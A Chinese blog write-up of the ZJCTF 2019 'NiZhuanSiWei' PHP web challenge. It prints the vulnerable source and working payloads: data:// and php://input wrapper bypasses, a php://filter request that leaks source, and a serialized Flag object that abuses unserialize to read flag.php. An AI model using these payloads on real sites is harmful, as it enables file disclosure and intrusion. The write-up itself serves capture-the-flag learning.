[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2024-08-23 17:00:00 发布

Jerem1ah

最新推荐文章于 2024-08-23 17:00:00 发布

阅读量439

点赞数 1

分类专栏： writeup 文章标签： web安全安全 php

本文链接：https://blog.csdn.net/qq_46266956/article/details/123966099

版权

writeup 专栏收录该内容

17 篇文章 0 订阅

订阅专栏

[ZJCTF 2019]NiZhuanSiWei

先搞不会的知识点：

1.file_get_contents()将文件读入到一个字符串并返回。

file() 函数把整个文件读入一个数组中。

漏洞：file_get_contents()可以使用伪协议绕过

解题：

php代码审计

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

过第一个if

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

经百度知道，file_get_contents($text,'r')可以用php://input，或data://来绕过

第一种方法：

?text=data://text/plain,welcome to the zjctf

看大佬博客可以welcome to the zjctf先base64，防止过滤。这道题没过滤

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

第二种方法：

用php://input伪协议以POST传参'welcome to the zjctf '

(这个我在Google中没成功，在firefox中，和bp中成功了)

?text=php://input

POST:welcome to the zjctf

注：这个伪协议利用的条件

enctype=“multipart/form-data” 的时候 php://input 是无效的
allow_url_include=on

文件包含

提示useless.php，那就先查看他的内容

利用php://filter伪协议，base64获得php源码

?text=data://text/plain,welcome to the zjctf&file=php://filter/convert.base64-encode/resource=useless.php

得到base64编码

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=

解码得到

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

构造反序列化的值

构造一个Flag对象，其file="flag.php"就OK了

<?php
class Flag{
	public $file;
}
$flag = new Flag;
$flag->file = "flag.php"
echo serialize($flag);
?>

代码执行一下获得序列化的结果

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最后

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在注释里找到flag：flag{399e8526-6115-424d-8365-5147fec37f62}

Jerem1ah

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
[ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei先搞不会的知识点：1.file_get_contents()将文件读入到一个字符串并返回。file() 函数把整个文件读入一个数组中。漏洞：file_get_contents()可以使用伪协议绕过解题：php代码审计<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(fil
复制链接

扫一扫